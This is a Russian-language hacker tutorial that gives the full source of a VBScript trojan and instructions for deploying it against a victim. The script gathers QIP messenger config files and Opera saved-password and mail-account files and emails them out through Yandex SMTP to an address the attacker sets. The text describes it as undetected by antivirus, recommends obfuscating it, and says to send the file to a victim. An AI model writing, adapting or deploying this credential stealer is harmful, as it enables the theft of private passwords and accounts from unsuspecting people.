В этой статье будем исследовать трой на vbs, его работу и функциональность. Ну что ж, начнем =) У всех вирей есть свои плюсы и минусы. И этот трой говорю сразу не идеален, ну довольно не плохой =)
В первую очередь я назову недостатки:
- номер аськи надо прописывать для каждой жертвы отдельно;
- если жертва не в сети тогда трой не сможет отправить пассы;
Теперь плюсы:
+ Не палица антивирями; =)
+ Не заметно запускается;
+ очень маленький размер самого троя;
Ну приступим к самому созданию трояна. Для начала создадим "текстовый документ.txt", переименуем его в (к примеру) 123.vbs .
Открываем получившийся файл и вставляем в него следующий код:
Код:
mail1="логин@yandex.ru"
mail2="мыло на которое прислать"
smtp="smtp.yandex.ru"
tema="Пасссы стырены"
pis="Они тут 
"
login="логин"
pass="пароль"
uin=номер аськи
QIP=":\Program Files\QIP\Users\" & uin & "\Config.ini"
Set WshNetwork = WScript.CreateObject("WScript.Network")
operapass=":\Documents and Settings\" & WshNetwork.username & "\Application Data\Opera\Opera\profile\wand.dat"
operamail=":\Documents and Settings\" & WshNetwork.username & "\Application Data\Opera\Opera\mail\accounts.ini"
on error resume next
Set S = CreateObject("Wscript.Shell")
set FSO=createobject("scripting.filesystemobject")
Call SendPost(smtp,mail2,mail1,tema,pis
Function SendPost(strSMTP_Server,strTo,strFrom,strSubject,strBody)
Set iMsg=CreateObject("CDO.Message")
Set iConf=CreateObject("CDO.Configuration")
Set Flds=iConf.Fields
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing")=2
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate")=1
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername")=login
Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword")=pass
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver")=smtp
Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport")=25
Flds.Update
iMsg.Configuration=iConf
iMsg.To=strTo
iMsg.From=strFrom
iMsg.Subject=strSubject
iMsg.TextBody=strBody
Dim FSO,FileName
Set FSO = WScript.CreateObject("Scripting.FileSystemObject")
if FSO.FileExists("C" & QIP) Then
iMsg.AddAttachment "C" & QIP
end if
if FSO.FileExists("D" & QIP) Then
iMsg.AddAttachment "D" & QIP
end if
if FSO.FileExists("E" & QIP) Then
iMsg.AddAttachment "E" & QIP
end if
if FSO.FileExists("F" & QIP) Then
iMsg.AddAttachment "F" & QIP
end if
if FSO.FileExists("C" & operapass) Then
iMsg.AddAttachment "C" & operapass
end if
if FSO.FileExists("D" & operapass) Then
iMsg.AddAttachment "D" & operapass
end if
if FSO.FileExists("E" & operapass) Then
iMsg.AddAttachment "E" & operapass
end if
if FSO.FileExists("F" & operapass) Then
iMsg.AddAttachment "F" & operapass
end if
if FSO.FileExists("C" & operamail) Then
iMsg.AddAttachment "C" & operamail
end if
if FSO.FileExists("D" & operamail) Then
iMsg.AddAttachment "D" & operamail
end if
if FSO.FileExists("E" & operamail) Then
iMsg.AddAttachment "E" & operamail
end if
if FSO.FileExists("F" & operamail) Then
iMsg.AddAttachment "F" & operamail
end if
iMsg.Send
End Function
Set iMsg=Nothing
Set iConf=Nothing
Set Flds=Nothing
mail1="логин@yandex.ru" - в этой строке нужно прописать мыло с которого будет трой отсылать стыренные файлы (желательно яндекс).
mail2="мыло на которое прислать" - тут прописать мыло на которое должны прийти пассы.
smtp="smtp.yandex.ru" - если сделали почту на яндексе, то тут можно не чего не трогать.
login="логин" - логин мыла которое вы прописали в mail1="логин@yandex.ru"
pass="пароль" - пароль мыла которое прописали mail1="логин@yandex.ru"
uin=номер аськи - номер ICQ жертвы
QIP=":\Program Files\QIP\Users\" & uin & "\Config.ini" -
Желательно криптануть этот скрипт, что бы его не кто не смог просмотреть.
Теперь это файл 123.vbs закидуем жертве, при запуске пассы от аси и оперы у вас на почте =)
